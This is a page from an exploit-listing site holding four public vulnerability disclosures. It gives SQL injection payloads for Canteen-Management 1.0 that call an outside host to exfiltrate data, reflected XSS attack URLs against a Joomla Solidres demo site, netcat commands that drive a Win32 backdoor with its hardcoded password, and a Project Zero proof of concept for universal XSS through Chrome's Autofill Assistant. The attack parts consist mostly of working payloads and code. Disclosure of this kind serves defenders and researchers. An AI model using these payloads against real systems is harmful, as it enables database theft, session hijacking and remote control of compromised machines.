Latest exploits :: CodePwn

<pre><code>## Title: Canteen-Management1.0-2022 SQLi ## Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Solidres Team │ │ Software : Joomla Solidres 2.12.9 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/ https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4& GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc [-] Done </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/273fd3f33279cc9c0378a49cf63d7a06.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.NTRC Vulnerability: Weak Hardcoded Credentials Family: NTRC Type: PE32 MD5: 273fd3f33279cc9c0378a49cf63d7a06 Vuln ID: MVID-2022-0646 Disclosure: 10/02/2022 Description: The malware listens on TCP port 6767. Authentication is required, however the password "Please change me" is weak and hardcoded in cleartext at offset 0045E520. Commands get executed by sending the password delimited by a semicolon ";" E.g. Please change me;SystemInfo;. The command SendScreen dumps screenshot as .BMF file, to get the next part of the file issue SendScreenNextPart. 0045E520 dd 16 ; Len 0045E520 db 'Please change me',0 ; Text 0045E539 align 4 Exploit/PoC: C:\>nc64.exe x.x.x.x 6767 SendScreen SendScreenNextPart Stop Please change me;Shutdown; Error;Can not shutdown the server. Please contact the author at borgo@bigfoot.com Please change me;Logoff; Please change me;SystemInfo; SystemInfo;6.2;9200;Windows NT;Victim;DESKTOP-2C3IQHO;C:\WINDOWS;1;Intel;Intel Pentium Please change me;SystemInfo2; ;;;;;0;0;0;0;0;;;;9 Mb;1480.29 Mb;27 %;2687.49 Mb;1607.21 Mb;40 %;2047.88 Mb;1893.88 Mb;D Please change me;Logoff; FolderMonitorChanged Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Chrome: Universal XSS in Autofill Assistant VULNERABILITY DETAILS From the Autofill Assistant README file[1]: Autofill Assistant is an execution engine to run user journeys on websites given a set of actions. These actions include clicking on buttons or scrolling to an element. They also provide a way to interact with the user or get input to advance in the flow. This report describes a chain of issues in the implementation of the assistant that allows a malicious attacker to execute JavaScript code in the context of an arbitrary website. 1. Launch Check Bypass There are several ways to launch a user journey i.e. to activate the assistant on a specific web page. From an attacker's point of view, the most interesting one is via Android intent:// URIs. To run the assistant, a web page simply needs to initiate navigation to a special URI. However, `ExternalNavigationHandler::handleWithAutofillAssistant()` is only meant to launch the journey if the navigation request comes from a web page in a subdomain of google.com i.e. a trusted source[2]. Unfortunately, if you look at the source code of `ExternalNavigationHandler::isGoogleReferrer()`[3], you'll notice that it actually only checks whether the main frame of the tab that's being navigated currently hosts a google.com page. This means the attacker can bypass the check by opening a google.com page first and then navigating it to the intent URI. This action doesn't violate the same-origin policy. ``` w = open(\"https://google.com/\"); setTimeout(() => w.location = \"intent://...\", 1000); ``` Another way to bypass the check is by putting a regular https:// link somewhere on google.com to the attacker-controlled website and configuring the attacker's web server to reply with an HTTP redirect to the intent:// URI. It's not clear whether the intended (rather than actual) checks are still too coarse-grained. Can an intent link be hosted on a user-controlled page in a subdomain of google.com, for example, via Google Sites? Can a third-party Android app launch the intent directly? 2. Parameter Manipulation Autofill Assistant intent URIs include the address of the target web page, as well as script parameters, which the attacker can arbitrarily modify. Some of the parameters, like `DISABLE_RPC_SIGNING`[4] or `PASSWORD_CHANGE_USERNAME`, seem to have security impact. Also, the `DETAILS_*` parameter group allows the attacker to show a partially-controlled native-looking user interface on top of websites that have associated user journeys. If, at the moment, only Google is allowed to create these URIs, could signature checking be added to prevent arbitrary manipulation of the script parameters? 3. Trigger Script Injection The most promising parameter is called `TRIGGER_SCRIPTS_BASE64`. It lets the attacker overwrite the backend's trigger script response[5]. Trigger scripts are lightweight scripts that may launch the regular journey flow once a certain set of conditions is met on the page. In addition, they can show a basic provisional user interface. Since the trigger condition definition language is powerful enough, for example, to perform a regex match on a specific property of a specific page element, and certain trigger actions, like loading a picture from an external server, may be visible to the attacker, a custom trigger script may be used to exfiltrate data from a web page character by character. A trigger script response can be overridden for any website, not just the ones that are currently supported by Autofill Assistant. Also, a user is shown a consent dialog when they attempt to use the assistant for the first time, but trigger scripts are executed without any user interaction. 4. JavaScript Injection Via Property Filter `JsFilterBuilder` translates trigger conditions defined by a script into JavaScript code, which is then executed in the context of the target web page. The builder properly encodes all of its inputs, using functions like `AddArgument`[6] and making sure it's impossible to corrupt the generated function and execute arbitrary code, with one unfortunate exception: ``` message PropertyFilter { // The property to filter against. optional string property = 1; oneof value { TextFilter text_filter = 2; AutofillValueRegexp autofill_value_regexp = 3; } } ``` The code that translates `PropertyFilter` simply concatenates the property name parameter, skipping the encoding[7]: ``` bool JsFilterBuilder::AddFilter(const SelectorProto::Filter& filter) { [...] case SelectorProto::Filter::kProperty: AddRegexpFilter(filter.property().text_filter(), filter.property().property()); [...] } void JsFilterBuilder::AddRegexpFilter(const TextFilter& filter, const std::string& property) { std::string re_var = AddRegexpInstance(filter); AddLine({\"elements = elements.filter((e) => \", re_var, \".test(e.\", property, \"));\"}); } ``` As a result, the attacker can run arbitrary JavaScript with a trigger script like the following: ``` trigger_scripts { trigger_condition { selector { filters { css_selector: \"*\" } filters { property { property: \"a+alert(location)\" text_filter { re2: \"\" } } } } } } ``` which gets translated into: ``` elements = elements.filter((e) => v1.test(e.a + alert(location))); ``` [1] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/ [2] https://source.chromium.org/chromium/chromium/src/+/main:chrome/android/java/src/org/chromium/chrome/browser/externalnav/ExternalNavigationDelegateImpl.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=323 [3] https://source.chromium.org/chromium/chromium/src/+/main:components/external_intents/android/java/src/org/chromium/components/external_intents/ExternalNavigationHandler.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=2098 [4] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/script_parameters.cc;drc=4c5a895bed6c12687227f92c8d66dfb0bfb03225;l=111 [5] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/service.proto;drc=39e992a5452136dd9944c9c957245e3f88885e71;l=783 [6] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=197 [7] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=189 VERSION Google Chrome 103.0.5060.53 (Official Build) REPRODUCTION CASE ``` <body> <h1>Click me</h1> <script> NS = \".org.chromium.chrome.browser.autofill_assistant.\"; TARGET_URL = \"https://google.com/\"; onclick = () => { w = open(\"https://google.com/\"); setTimeout(() => { w.location = `intent://a/#Intent; scheme=http; S.browser_fallback_url=${escape(TARGET_URL)}; B${NS}ENABLED=true; B${NS}START_IMMEDIATELY=false; S${NS}TRIGGER_SCRIPTS_BASE64=CiQKIkIgSgMSASpKGXIXChFhK2FsZXJ0KGxvY2F0aW9uKRICCgA=; end`.replace(/\\s/g, \"\"); }, 1000); } </script> </body> ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-09-22. Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline. For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html. Found by: glazunov@google.com </code></pre>